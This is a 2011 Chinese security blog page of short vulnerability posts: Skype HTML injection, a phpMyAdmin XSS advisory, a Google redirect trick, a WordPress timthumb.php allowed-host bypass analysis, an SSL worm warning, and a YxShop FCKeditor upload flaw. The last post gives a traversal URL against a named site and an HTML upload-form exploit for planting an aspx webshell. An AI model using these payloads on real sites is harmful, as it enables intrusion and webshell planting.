日志分类:漏洞交流

Skype多个字段多个HTML注入漏洞

时间:2011年08月29日作者:小侃评论次数:0

影响版本:
Skype Technologies Skype 4.2 169
 Skype Technologies Skype 4.2 155
 Skype Technologies Skype 4.2 152
 Skype Technologies Skype 4.1 .179
 Skype Technologies Skype 4.1 .179
 Skype Technologies Skype 4.1 .166
 Skype Technologies Skype 4.1 .141
 Skype Technologies Skype 4.1 .136
 Skype Technologies Skype 4.1 .130
 Skype Technologies Skype 4.0 .227
 Skype Technologies Skype 4.0 .226
 Skype Technologies Skype 4.0 .224
 Skype Technologies Skype 4.0 .216
 Skype Technologies Skype 4.0 .215
 Skype Technologies Skype 4.0 .206
 Skype Technologies Skype 5.5.0.113
 Skype Technologies Skype 5.5
 Skype Technologies Skype 5.4
 Skype Technologies Skype 5.3.0.120
 Skype Technologies Skype 5.3
 Skype Technologies Skype 5.0.0.105
 Skype Technologies Skype 4.2.0.166
 Skype Technologies Skype 4.2.0.163
 Skype Technologies Skype 4.2.0.158
测试方法:
[www.chnxiaokan.com]
本博客提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
漏洞描述:
Bugtraq ID: 49194

Skype是一款流行的P2P VoIP软件,可提供高质量的语音通讯服务。
Skype不正确过滤下面用户信息条目中的输入和输出:
- home
- office
- mobile
攻击者可以进行跨站脚本攻击,可能获得敏感信息或劫持用户会话。
测试方法:
[www.chnxiaokan.com]
本博客提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

--- SNIP ---
Home Phone Number:
<b>INJECTION HERE</b>
Office Phone Number:
<center><i>INJECTION HERE</i></center>
Mobile Phone Number:
<a href="#">INJECTION HERE</a>
--- SNIP ---
演示:
    - http://www.noptrix.net/tmp/skype_inject.png
小侃安全建议:
厂商解决方案
目前没有详细解决方案提供:
http://www.skype.com/

phpMyAdmin多个脚本插入漏洞

时间:2011年08月29日作者:小侃评论次数:0

受影响系统:
phpMyAdmin phpMyAdmin
3.x
描述:
——————————————————————————–
CVE
ID: CVE-2011-3181

 

phpMyAdmin是一个用PHP编写的,可以通过 web 方式控制和操作 MySQL 数据库。

phpMyAdmin在实现上存在安全漏洞,可被恶意用户执行脚本插入攻击。

传递到表格、列和索引名称的某些输入在用于Tracking功能之前没有正确过滤。可通过插入任意HTML和脚本代码在查看后执行。

<*来源:Norman
Hippert

链接:http://www.phpmyadmin.net/home_page/security/PMASA-2011-13.php
*>

建议:
——————————————————————————–
厂商补丁:

phpMyAdmin
———-
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.phpmyadmin.net/home_page/security/

 

Google URL跳转利用

时间:2011年08月14日作者:小侃评论次数:0

 

Oday摘要:

简要描述:

http://www.google.com/search?btnI&q=allinurl:http://cxiaokam.com/

详细说明:
搜索返回查询的页面,可以社工利用。

标签:分类:漏洞交流

WordPress中timthumb.php远程文件存储漏洞分析

时间:2011年08月09日作者:小侃评论次数:0

今天在微博上看见的关于wordpress出现了漏洞,随即赶紧打开相关页面分析具体原因,发现是timthumb.php远程存储文件时候的验证上不足而产生的漏洞。大概分析过程如下:
该文件对提交的src变量提交并验证后存储到服务器上
$src = get_request (‘src’, ”);
利用parse_url ($src)将src进行url分割,然后进行验证
global $allowedSites;
// work out file details
$filename = ‘external_’ . md5 ($src);
$local_filepath = DIRECTORY_CACHE . ‘/’ . $filename;
// only do this stuff the file doesn’t already exist
if (!file_exists ($local_filepath)) {
if (strpos (strtolower ($src), ‘http://’) !== false || strpos (strtolower ($src), ‘https://’) !== false) {
if (!validate_url ($src)) {
display_error (‘invalid url’);
}
$url_info = parse_url ($src);
if (count (explode (‘.’, $url_info[‘path’])) > 2) {
display_error (‘source filename invalid’);
}
if (($url_info[‘host’] == ‘www.youtube.com’ || $url_info[‘host’] == ‘youtube.com’) && preg_match (‘/v=([^&]+)/i’, $url_info[‘query’], $matches)) {
$v = $matches[1];
$src = ‘http://img.youtube.com/vi/’ . $v . ‘/0.jpg’;
$url_info[‘host’] = ‘img.youtube.com’; //如果来源是youtube,则修改之前存储的host
}
$isAllowedSite = false;
// check allowed sites (if required)
if (ALLOW_EXTERNAL) { //ALLOW_EXTERNAL默认为false
$isAllowedSite = true;
} else {
foreach ($allowedSites as $site) {
if (strpos (strtolower ($url_info[‘host’]), $site) !== false) //在$url_info[‘host’])查找是否存在$site
$isAllowedSite = true; //当为true就继续下一步的存储
}
}
}
其中$allowedSites数组在文件头定义如下
$allowedSites = array (
‘flickr.com’,
‘picasa.com’,
‘img.youtube.com’,
);
进过一系列的验证如果$isAllowedSite如果为真就开始存储这个文件到服务器上
if ($isAllowedSite) {
if (function_exists (‘curl_init’)) {
global $fh;
$fh = fopen ($local_filepath, ‘w’);
$ch = curl_init ($src);
curl_setopt ($ch, CURLOPT_TIMEOUT, CURL_TIMEOUT);
curl_setopt ($ch, CURLOPT_USERAGENT, ‘Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0’);
curl_setopt ($ch, CURLOPT_URL, $src);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt ($ch, CURLOPT_FILE, $fh);
curl_setopt ($ch, CURLOPT_WRITEFUNCTION, ‘curl_write’);
// error so die
if (curl_exec ($ch) === FALSE) {
unlink ($local_filepath);
touch ($local_filepath);
display_error (‘error reading file ‘ . $src . ‘ from remote host: ‘ . curl_error ($ch));
}
curl_close ($ch);
fclose ($fh);
// check it’s actually an image
$file_infos = getimagesize ($local_filepath);
// no mime type or invalid mime type
if (empty ($file_infos[‘mime’]) || !preg_match (“/jpg|jpeg|gif|png/i”, $file_infos[‘mime’])) {
unlink ($local_filepath);
touch ($local_filepath);
display_error (‘remote file not a valid image’);
}
} else {
if (!$img = file_get_contents ($src)) {
display_error (‘remote file for ‘ . $src . ‘ can not be accessed. It is likely that the file permissions are restricted’);
}
if (file_put_contents ($local_filepath, $img) == FALSE) {
display_error (‘error writing temporary file’);
}
}
if (!file_exists ($local_filepath)) {
display_error (‘local file for ‘ . $src . ‘ can not be created’);
}
$src = $local_filepath;
} else {
display_error (‘remote host “‘ . $url_info[‘host’] . ‘” not allowed’);
}
使用了strpos验证是否匹配列表中的条件应该是考虑到其分域名问题,不过也形成了一些安全隐患,例如picasa.com.yourdomain.com也是符合这个匹配条件的。关于存储文件的位置信息在如下代码中

$filename = ‘external_’ . md5 ($src);
$local_filepath = DIRECTORY_CACHE . ‘/’ . $filename;
不过通过修改这个匹配规则或直接删除$isAllowedSite所有数组元素都可以临时解决该问题。
备注:发现一些timthumb.php版本中$isAllowedSite数组元素和存储文件方式不太一致,不过漏洞产生原因与此关系不是很大

“隐蔽杀手”可能五一发作破坏互联网

时间:2011年07月21日作者:小侃评论次数:0

【eNews消息】据金山毒霸反病毒中心最新消息,针对SLL服务漏洞的蠕虫,可能在未来7天内出现。”虽然目前尚不足以判定该体制的蠕虫会对网络构成重大影响,但由于众所周知的SSL服务的敏感性,以及其可能带来的相应的数据安全性威胁,我们将该警告制定为A级。

在微软公告中,并没有对该漏洞进行细节描述,从目前的分析看:微软证书服务中使用的PCT协议是Microsoft SSL库的实现, 该协议在处理客户端请求的时候存在一个远程缓冲区溢出漏洞。ct1SrvHandleUniHello函数在处理参数的第3个参数的时候,导致可造成覆盖 溢出。

毒霸反病毒工种师分析:攻击者发送一段精心构造的数据,就可以获得目标系统的全部权限,包括在目标系统上执行程序、安装和卸载软件包。目前已经有公开的exploit代码,该测试代码有比较高的溢出成功率,很容易被别有用心者修改成蠕虫传播。

由于SSL服务并非常用服务,如果蠕虫只依赖本服务传播预测为使用大量线程扫描的快速扫描蠕虫,因此可能影响到感染节点所在网络的出口设备和出口带宽。其他扫描性蠕虫可能会扩展相应模块以使用该漏洞。

提醒注意:

1、网络出口大量目标端口为443的数据包。

2、服务器节点,发出大量目标端口为443的数据包(说明已经被蠕虫感染)。

预防办法:

采用Microsoft Windows NT架构系统的服务器,如无需开放SSL服务的建议关闭。如果SSL系统为内部网络使用,建议从防火墙block目标端口为443、636的数据包。所有 Microsoft Windows NT架构Server用户,必须安装以下补丁。

金山毒霸强烈建议所有MS用户立即将系统补丁升级到最新版本,(目前有大量用户只安装了SP4和微软的冲击波补丁,这是很危险的)

下面是简体中文OS补丁下载地址:

Winnt Workstation:
http://download.microsoft.com/do … B835732-x86-CHS.EXE

Winnt Server:
http://download.microsoft.com/do … B835732-x86-CHS.EXE

Windows 2000:
http://download.microsoft.com/do … B835732-x86-CHS.EXE

Windows XP:
http://download.microsoft.com/do … B835732-x86-CHS.EXE

Windows 2003:
http://download.microsoft.com/do … B835732-x86-CHS.EXE

如没有安装金山毒霸,可以登录http://online.kingsoft.net使用金山毒霸的在线查毒或是金山毒霸下载版来防止新病毒的侵入;或可以选择登录到http://www.duba.net下载“网络天空”专杀工具,以防止该病毒的肆虐。金山公司的为广大用户提供反病毒咨询,求助热线为:010-82326868。

YxShop易想购物商城4.7.1版本任意文件上传漏洞

时间:2011年07月19日作者:小侃评论次数:0

今晚碰巧碰到了这个程序,就去搜索了一下,发现用的人还不少。也没有搜到黑客公布此程序的漏洞,所以下了源码,找到了fckeditor文件夹,看了下其目录结构就觉得有戏。直接上传aspx马日下。。
这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。
其他版本我没测试,估计也是一样的问题
http://www.chndianai.com/controls/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx
跳转到网站根目录上传任意文件。
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
<form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media” method=”post”>
Upload a new file:<br>
<input type=”file” name=”NewFile” size=”50″><br>
<input id=”btnUpload” type=”submit” value=”Upload”>
</form>